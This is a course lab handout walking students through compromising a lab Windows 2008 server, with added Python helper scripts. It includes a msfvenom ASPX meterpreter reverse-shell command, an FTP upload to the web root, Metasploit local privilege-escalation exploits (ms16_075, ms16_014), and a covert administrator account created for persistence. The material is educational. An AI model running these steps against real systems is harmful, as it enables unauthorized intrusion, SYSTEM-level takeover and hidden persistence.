
Project-2: Privilege Escalation-1

In this project, you are assigned to gain privileged access to a Windows 2008 Server in a CTF (Capture-the-Flag) event. You will discover that the Windows 2008 server runs vulnerable FTP and HTTP services. First, you will abuse these services with the Metasploit Framework to gain an unprivileged shell. Then you will use the "local exploit suggester" module of the Metasploit Framework and try to gain a privileged shell; the first suggested exploit will not elevate you, but on your second try you will get a privileged shell. After privilege escalation, you will create an administrator account on the vulnerable Windows 2008 server to maintain access.

Reminder

Please skim the specified chapters of the book (Metasploit 5.0 for beginners 2nd ed.) before starting this project.

Computers

Notes:

1) You will perform all of your actions from Kali Linux.

2) You cannot copy and paste between your computer and the computers in the Netlab environment. It is both quicker and more reliable to type the first 2-3 letters of each command or parameter in Metasploit and then press the Tab key to complete it.

3) Use Ctrl+- (Ctrl and the minus key) to shrink the font in the Kali Linux terminal window; alternatively, click View on the menu bar and then the Shrink Font menu item.

4) If you get an error like “Meterpreter session # closed. Reason: Died”, end your reservation and restart the lab unless otherwise specified. The cause of this error is the session timing out. In the second reservation, go through the steps more quickly.

Steps of Hacking

1) Perform a port scan against the Windows 2008.

2) Check the FTP server for anonymous login.

3) Check the configurations of FTP and HTTP services.

4) Create an ASPX reverse shell on Kali Linux.

5) Upload the ASPX file to the Windows 2008.

6) Prepare a handler on Kali Linux.

7) Call the ASPX reverse shell using the Firefox browser (the ASPX will run in the web application and communicate with the handler on Kali Linux). Check that the ASPX reverse shell connects to the handler and that you get a shell from Windows 2008.

8) Confirm that shell is low-privileged.

9) Try to escalate privilege.

10) Escalate privilege.

11) Create an Administrator account on Windows 2008.

The List of Actions/Commands per Step

1. Perform a port scan against the Windows 2008

In this part, you use Nmap's -sV option. This option detects the version of the service running behind each open port. The scan takes a bit longer than the command without this parameter.

You can compare the durations and the outputs of the two commands below.

nmap 192.168.2.11 -n

nmap 192.168.2.11 -n -sV

2. Check FTP server for anonymous login

Command

Notes

nmap 192.168.2.11 -n --script ftp-anon -p 21

You performed this in Lab-5, Section-6, against another server (Metasploitable).

3. Check the configurations of FTP and HTTP services

Open the Firefox browser and check the web page served by Windows 2008 by entering the server’s IP to the browser.

Connect to the FTP server as the Anonymous user. Once logged in, list the files with the dir command. (The Nmap script in Step-2 showed the same files and folders.)

Did you notice that the Web and FTP services are using the same home folder?

Think about this scenario: what if you could upload a shell file using the FTP service and then call that file from the web application? Anonymous write access to a directory that the web server executes code from turns a file-upload weakness into remote code execution.
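The following script is an added example, not part of the original lab handout. It turns the observation above into a repeatable check: it parses the ftp-anon output from Step-2 and then proves that the FTP root and the web root overlap by uploading a random marker file over anonymous FTP and fetching it back over HTTP. The target address, the anonymous credentials, the marker file name and the sample Nmap output are assumptions constructed for the lab network, not values taken from the handout.

```python
#!/usr/bin/env python3
"""Added example (not part of the lab handout): confirm that the anonymous FTP
root and the IIS web root are the same directory.

Step-2 runs `nmap --script ftp-anon`; Step-3 asks you to notice that FTP and
HTTP serve the same folder. This script parses the ftp-anon output and then
proves the overlap by uploading a random marker file over anonymous FTP and
fetching it back over HTTP. The target address, the anonymous credentials and
the marker name are assumptions for the lab network, not values from the
handout.
"""
import ftplib
import io
import re
import secrets
import urllib.error
import urllib.request

# Constructed sample of nmap's ftp-anon output against an IIS FTP server
# (DOS-style directory listing). Not captured from the lab machine.
SAMPLE_NMAP_OUTPUT = """\
PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-14-20  05:27PM       <DIR>          aspnet_client
|_06-14-20  05:29PM                  689 default.aspx
"""

# One IIS/DOS-style listing line as nmap prints it inside the script block.
_LISTING_RE = re.compile(
    r"^\|_?\s*(?P<date>\d{2}-\d{2}-\d{2})\s+(?P<time>\d{2}:\d{2}[AP]M)\s+"
    r"(?:(?P<dir><DIR>)|(?P<size>\d+))\s+(?P<name>.+?)\s*$"
)


def parse_ftp_anon(nmap_output):
    """Return (anonymous_allowed, entries) from ftp-anon script output.

    entries is a list of {name, is_dir, size} dicts. Only DOS-style listing
    lines are understood; any other line is ignored.
    """
    allowed = "Anonymous FTP login allowed" in nmap_output
    entries = []
    for line in nmap_output.splitlines():
        m = _LISTING_RE.match(line)
        if m:
            entries.append({
                "name": m.group("name"),
                "is_dir": m.group("dir") is not None,
                "size": int(m.group("size") or 0),
            })
    return allowed, entries


def web_exposed_names(entries):
    """File names the web server would serve if it shares this directory."""
    return sorted(e["name"] for e in entries if not e["is_dir"])


def probe_shared_root(host, ftp_user="anonymous", ftp_pass="anonymous@", timeout=10):
    """Upload a marker over FTP, fetch it over HTTP, then clean up (network call).

    Returns True when the HTTP body equals the uploaded marker, i.e. the FTP
    root and the web root overlap and anonymous uploads are reachable from
    the browser.
    """
    name = "probe_%s.txt" % secrets.token_hex(4)
    body = secrets.token_hex(16).encode()
    ftp = ftplib.FTP(host, timeout=timeout)
    try:
        ftp.login(ftp_user, ftp_pass)
        ftp.storbinary("STOR " + name, io.BytesIO(body))
        try:
            url = "http://%s/%s" % (host, name)
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                return resp.read() == body
        except urllib.error.URLError:   # covers HTTPError (404, 403, ...)
            return False
        finally:
            try:
                ftp.delete(name)   # leave the target as we found it
            except ftplib.all_errors:
                pass
    finally:
        ftp.close()


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.2.11"  # assumed lab address
    ok, listing = parse_ftp_anon(SAMPLE_NMAP_OUTPUT)
    print("anonymous login:", ok, "| files reachable over HTTP:", web_exposed_names(listing))
    print("FTP root == web root on %s: %s" % (target, probe_shared_root(target)))
```

The marker probe is the same trick as Step-5 and Step-7 with a harmless text file instead of an ASPX payload: if the random marker comes back over HTTP, anything you upload over FTP will be served (and, for .aspx, executed) by IIS.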

4. Create an ASPX reverse shell on Kali Linux

You will use msfvenom to create an ASPX reverse shell. Server operating systems usually run a 64-bit architecture, so you will build a 64-bit payload for the exploitation.

Commands

Notes

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.10 lport=443 -f aspx > reverseshell.aspx

reverseshell.aspx will be created.

5. Upload the ASPX file to the Windows 2008

Upload the file to the Windows 2008 server using the FTP service (log in as Anonymous, as in Step-3, and upload it with the ftp client's put command).

6. Prepare a handler on Kali Linux

An ASPX reverse shell on its own does not give you control of the remote server (Windows 2008). There must be a corresponding handler that answers the ASPX reverse shell's connection request and sends commands to it. A handler can be regarded as a command-and-control server. The reverse shell is like an RC car, but only the car; the handler is the remote-control unit. Neither works alone. In this analogy, the remote control's frequency must match the frequency of the receiver in the car. Similarly, the parameters of the handler you are creating (payload, lhost, lport) must match the parameters of the ASPX shell exactly.

msfconsole

This command opens the Metasploit Framework.

use exploit/multi/handler

Use multi/handler, a stub module that handles exploits launched outside of the framework (in this case, the reverseshell.aspx file).

setg payload windows/x64/meterpreter/reverse_tcp

Use the reverse_tcp payload for this handler. Note that you used the set command in Project-1; in this project you are using setg. setg sets an option globally, so this option and the following ones can be used by any module loaded later on.


setg lhost 192.168.2.10

Set global local host as 192.168.2.10

setg lport 443

Set global local port as 443

exploit or
run

Both commands will do the same thing and run the multi/handler

7. Call the ASPX reverse shell using the Firefox browser (the ASPX will run in the web application and communicate with the handler on Kali Linux). Check that the ASPX reverse shell connects to the handler and that you get a shell from Windows 2008

Commands/Actions

Notes

Call the reverse shell file you uploaded by using the Firefox browser on Kali Linux

You did a similar thing in Project-1.

Check that the “Meterpreter session # opened” message appears in the handler window after you call the reverse shell

shell

Type this to get the shell from Windows 2008. After typing “shell”, you will see the command prompt of the Windows 2008 server.

whoami

It should be “iis apppool\asp.net v4.0”.

This is not a regular user account; it is the service identity (the application pool identity) under which the IIS web application runs, so everything the ASPX shell does runs with that identity's rights.

Take a screenshot of the user account.

Let’s try to do some actions that require privileged access.

8. Confirm that shell is a low-privileged shell

Commands

Notes

net user ms_service mypass123 /add

Try to add a user named ms_service (login name)

cd ..

Go up one level to the system32 directory (the shell starts in system32\inetsrv, the IIS folder).

cd config

Try to enter the config directory, where critical files such as the SAM database and the registry hives are stored.

dir

See the files in the system32 folder.

del wmi.dll

Try to delete a file under system32 (access should be denied).

This is an unprivileged shell. It can read most of the file system, but it cannot create accounts or modify files under system32; in that sense it behaves like a “read-only” shell.

exit

Exit from the command prompt of Windows 2008.

Important note: This may kill the low-privilege shell in Metasploit, resulting in this message:
“192.168.2.11 – Meterpreter session # closed. Reason: Died”

In this case, you will see the msf5 exploit(multi/handler) > prompt instead of the meterpreter > prompt.

If this is the case, proceed with the following two steps.

If this is NOT the case, go directly to Step-9.

exploit or
run

Run the multi/handler again.

Call the reverse shell (reverseshell.aspx) you uploaded by using the Firefox browser

This reopens the shell.
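Step-8 proves the shell is unprivileged by watching commands fail. The script below is an added example, not part of the lab handout: it reads the same facts from the token itself, using the output of whoami, whoami /groups and whoami /priv that you would paste in from the Windows command prompt, and it also reports which token privileges are enabled. That second part matters for Step-9: IIS application pool identities normally hold SeImpersonatePrivilege, which is the privilege the MS16-075 reflection ("potato") family of local exploits relies on. The command outputs embedded in the script are constructed to match Windows' formatting; they are not captures from the lab server, and the user name strings are assumed.

```python
#!/usr/bin/env python3
"""Added example (not from the lab handout): classify a Windows shell from the
output of `whoami`, `whoami /groups` and `whoami /priv`.

The sample outputs below are constructed to match Windows' column layout; they
were not captured from the lab server.
"""
import re

# Token privileges that the potato/reflection style local exploits need.
POTATO_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# Constructed `whoami /priv` output for an IIS application pool identity.
SAMPLE_APPPOOL_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Constructed `whoami /groups` output for the same identity.
SAMPLE_APPPOOL_GROUPS = """\
GROUP INFORMATION
-----------------

Group Name         Type             SID          Attributes
================== ================ ============ ==================================================
Everyone           Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\\IIS_IUSRS  Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Users      Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
"""

# Constructed, abridged outputs for a SYSTEM shell.
SAMPLE_SYSTEM_GROUPS = """\
Group Name             Type             SID          Attributes
====================== ================ ============ ==================================================
BUILTIN\\Administrators Alias            S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
"""
SAMPLE_SYSTEM_PRIV = """\
Privilege Name         Description                               State
====================== ========================================= ========
SeTcbPrivilege         Act as part of the operating system       Enabled
SeDebugPrivilege       Debug programs                            Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
"""

_PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)$")
_GROUP_RE = re.compile(
    r"^(?P<name>\S.*?)\s{2,}(?P<type>\S.*?)\s+(?P<sid>S-1-[\d-]+)\s*(?P<attrs>.*)$")


def parse_privileges(whoami_priv):
    """Map privilege name -> True if Enabled, False if Disabled."""
    privs = {}
    for line in whoami_priv.splitlines():
        m = _PRIV_RE.match(line.rstrip())
        if m:
            privs[m.group(1)] = m.group(2) == "Enabled"
    return privs


def parse_groups(whoami_groups):
    """Map group name as printed (e.g. BUILTIN\\Users) -> attribute text."""
    groups = {}
    for line in whoami_groups.splitlines():
        m = _GROUP_RE.match(line.rstrip())
        if m:
            groups[m.group("name")] = m.group("attrs")
    return groups


def classify_shell(whoami_user, whoami_groups, whoami_priv):
    """Return {user, level, potato_privs, can_try_potato}.

    level is "system", "admin" (Administrators enabled in the token),
    "admin-filtered" (member, but UAC marked the group deny-only) or "low".
    """
    user = whoami_user.strip().lower()
    groups = parse_groups(whoami_groups)
    privs = parse_privileges(whoami_priv)
    admins = groups.get("BUILTIN\\Administrators")
    if user == "nt authority\\system":
        level = "system"
    elif admins is not None and "deny only" in admins:
        level = "admin-filtered"
    elif admins is not None and "Enabled group" in admins:
        level = "admin"
    else:
        level = "low"
    enabled = [p for p in POTATO_PRIVS if privs.get(p)]
    return {"user": user, "level": level, "potato_privs": enabled,
            "can_try_potato": level != "system" and bool(enabled)}


if __name__ == "__main__":
    print(classify_shell("iis apppool\\asp.net v4.0", SAMPLE_APPPOOL_GROUPS, SAMPLE_APPPOOL_PRIV))
    print(classify_shell("nt authority\\system", SAMPLE_SYSTEM_GROUPS, SAMPLE_SYSTEM_PRIV))
```

Run whoami /groups and whoami /priv in the Windows command prompt you reach with the shell command, paste the text into the sample constants (or read it from files), and compare the result before and after Step-10: the level should move from "low" to "system".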

9. Try to escalate privilege

Commands

Notes

background

Send the existing shell to the background.

Important: Make a note of the shell’s session ID

search suggester

This is an informational search command. It finds the exploit suggester module in Metasploit. (The suggester does not escalate privileges itself; it runs the check of each local exploit module against the session and lists the ones whose checks pass.)

use post/multi/recon/local_exploit_suggester

You will use this local exploit suggester

show options

See the options of the suggester module. It takes the Session ID as a parameter.

set session #

You should replace the # symbol with the session ID number of the shell you sent to the background at the beginning of Step-9.

exploit or
run

Run the local_exploit_suggester module to find local exploits. This command takes a little time (about 10 seconds) to show the results.

At this time, the local_exploit_suggester module will use the shell you sent to the background and try to find exploitable local vulnerabilities. The low privilege level on the shell will be sufficient to find exploitable local vulnerabilities.

use exploit/windows/local/ms16_075_reflection

You are lucky that the suggester module suggests many exploits. You will try them until you get a high-privileged shell.

Select ms16_075_reflection exploit first to try privilege escalation

show options

After this command, you will see the global options you set in Step-6 (ms16_075 will use the lhost and lport values you set there for the handler it starts for its new session).

set session 1

This is the session you sent to the background (use the session ID you noted; it is 1 if this was your first session).

run

Run the selected exploit.

Metasploit will run the local exploit through the backgrounded session and try to open a new, high-privileged session back to your handler. The exploit starts with the privileges of the “iis apppool\asp.net v4.0” identity.

You should get the message below:

Meterpreter session # opened

192.168.2.10:443 -> 192.168.2.11:some_port

Congrats! You get a shell!

Note that Session # will be one more than the session number you sent to the background.

shell

Get the shell from Windows 2008. You will see the command prompt of the Windows 2008 server.

whoami

Sigh. This is still an unprivileged shell! The new session runs as the same IIS application pool identity.

exit

Exit from the command prompt of Windows 2008.

10. Escalate privilege

background

Notice that the session created by the ms16_075_reflection exploit is now also in the background. There are two unprivileged sessions in the background.

use exploit/windows/local/ms16_014_wmi_recv_notif

Select another exploit module to try the privilege escalation. (If you scroll up in the terminal window, you will see that this is one of the exploits in the local_exploit_suggester output.)

show options

Just check the lhost and lport parameters

set session #

Which session number should go here: the session you sent to the background earlier (the original ASPX shell) or the one you backgrounded just now?

The answer is the earlier one.

The local_exploit_suggester evaluated that session, so its suggestions apply to it; the later session is just another unprivileged shell that the failed attempt produced.

run

Run the selected exploit.

Metasploit will run the local exploit through the original backgrounded session and try to open a new, high-privileged session back to your handler. The exploit starts with the privileges of the “iis apppool\asp.net v4.0” identity.

You should get the message below:

Meterpreter session # opened

192.168.2.10:443 -> 192.168.2.11:some_port

You get a shell once again!

Note that you will see a new session number here.

shell

Get the command prompt of Windows 2008 to the Metasploit window.

whoami

Congrats! whoami now reports nt authority\system: you have the highest privilege that one can have on a Windows operating system.

Take a screenshot of the terminal window.
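The script below is an added example, not part of the lab handout, and serves two passages above: the "same frequency" requirement between the msfvenom payload and the handler in Step-6, and the rule in Step-10 that every suggested local exploit must be pointed at the session the suggester inspected. It keeps payload, lhost and lport in one place, generates the msfvenom command and an msfconsole resource script from it, checks a handler script against an msfvenom command for mismatches, and turns local_exploit_suggester output into a resource script that tries each suggested module against the original session ID. The addresses in CONFIG are assumed lab values and the suggester output is a constructed sample in the module's log format, not a capture from the lab machine.

```python
#!/usr/bin/env python3
"""Added example (not part of the lab handout): keep the msfvenom stager and
the multi/handler in step, and retry each suggested local exploit against the
ORIGINAL session. CONFIG holds assumed lab values; the suggester output is a
constructed sample, not a capture from the lab machine.
"""
import re

# Single source of truth for the values that must agree between stager and handler.
CONFIG = {
    "arch": "x64",
    "payload": "windows/x64/meterpreter/reverse_tcp",
    "lhost": "192.168.2.10",
    "lport": 443,
}

# Constructed sample in local_exploit_suggester's output format.
SAMPLE_SUGGESTER_OUTPUT = """\
[*] 192.168.2.11 - Collecting local exploits for x64/windows...
[*] 192.168.2.11 - 30 exploit checks are being tried...
[+] 192.168.2.11 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 192.168.2.11 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[-] 192.168.2.11 - exploit/windows/local/ms15_051_client_copy_image: The target is not exploitable.
[+] 192.168.2.11 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
"""

_SUGGEST_RE = re.compile(
    r"^\[\+\]\s+\S+\s+-\s+(?P<module>exploit/\S+?):\s+The target (?:appears to be|is) vulnerable")


def suggested_modules(output):
    """Modules the suggester flagged as vulnerable, in output order, without duplicates."""
    mods = []
    for line in output.splitlines():
        m = _SUGGEST_RE.match(line)
        if m and m.group("module") not in mods:
            mods.append(m.group("module"))
    return mods


def msfvenom_command(cfg, outfile="reverseshell.aspx"):
    """The msfvenom line for the ASPX stager, built from the shared config."""
    return ("msfvenom -a {arch} -p {payload} LHOST={lhost} LPORT={lport} "
            "-f aspx > {out}").format(out=outfile, **cfg)


def handler_rc(cfg):
    """Resource script that starts multi/handler with the same payload/LHOST/LPORT.

    `exploit -z` runs in the foreground and, with the default ExitOnSession,
    stops listening once the first session arrives, which frees LPORT for the
    handlers the local exploits start later.
    """
    return "\n".join(["use exploit/multi/handler",
                      "setg PAYLOAD " + cfg["payload"],
                      "setg LHOST " + cfg["lhost"],
                      "setg LPORT " + str(cfg["lport"]),
                      "exploit -z", ""])


def handler_mismatches(venom_cmd, rc_text):
    """PAYLOAD/LHOST/LPORT values that differ between an msfvenom line and a handler rc.

    Returns [(option, msfvenom_value, handler_value), ...]; an empty list means
    the remote control and the car are on the same frequency.
    """
    venom = {}
    m = re.search(r"(?:^|\s)-p\s+(\S+)", venom_cmd)
    if m:
        venom["PAYLOAD"] = m.group(1)
    for key, val in re.findall(r"\b(LHOST|LPORT)=(\S+)", venom_cmd, re.I):
        venom[key.upper()] = val
    handler = {}
    for key, val in re.findall(r"^setg?\s+(\w+)\s+(\S+)", rc_text, re.I | re.M):
        handler[key.upper()] = val
    return [(k, venom.get(k), handler.get(k))
            for k in ("PAYLOAD", "LHOST", "LPORT") if venom.get(k) != handler.get(k)]


def privesc_rc(cfg, modules, session_id):
    """Resource script that tries each suggested module against session_id.

    Every attempt is given the ORIGINAL session number: a failed attempt may
    still open a new unprivileged session, and the suggester's verdicts only
    apply to the session it actually inspected.
    """
    lines = ["setg LHOST " + cfg["lhost"], "setg LPORT " + str(cfg["lport"])]
    for mod in modules:
        lines += ["use " + mod,
                  "set SESSION %d" % session_id,
                  "set PAYLOAD " + cfg["payload"],
                  "exploit -z"]   # no auto-interact; inspect `sessions -l` afterwards
    lines.append("sessions -l")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    mods = suggested_modules(SAMPLE_SUGGESTER_OUTPUT)
    print(msfvenom_command(CONFIG))
    print("handler mismatches:", handler_mismatches(msfvenom_command(CONFIG), handler_rc(CONFIG)))
    print(privesc_rc(CONFIG, mods, session_id=1))
```

Save the generated text to a file and load it with msfconsole -r file.rc. After the run, sessions -l shows one new session per module that worked; the one opened by ms16_014_wmi_recv_notif is the SYSTEM shell from Step-10, while the one from ms16_075_reflection is still the application pool identity, which is why the script never points a later module at it.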

11. Create an Administrator account on Windows 2008

Commands/Actions

Notes

net user ms_service mypass123 /add

Now, you will do things to maintain access (persistence). Even if the system admin patches the computer, you will have an administrator account.

You will create a user named ms_service. This name is chosen on purpose: it looks like a service account and does not attract attention.

net localgroup administrators ms_service /add

Add this user to the Administrators group

Switch to Windows 2008

Switch to Windows 2008 on Netlab

Log in with administrator / aA12345

Click on the Start icon > Administrative Tools > Computer Management > Local Users and Groups > Users

You will see the ms_service account here

Click on the Start icon > Logoff

See the ms_service on the login screen.

Take a screenshot of the Windows 2008 logon screen.

You can log in to the ms_service account if you want.

Weekly Learning and Reflection 

In two to three paragraphs (i.e., sentences, not bullet lists) using APA style citations if needed, summarize, and interact with the content covered in this project. Summarize what you did as an attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention the attackers and all of the targets in your summary. You can provide topologies, sketches, graphics if you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should think and write critically, not just about what was presented but also what you have learned through the session. You can ask questions for the things you’re confused about. Questions asked here will be summarized and answered anonymously in the next class.
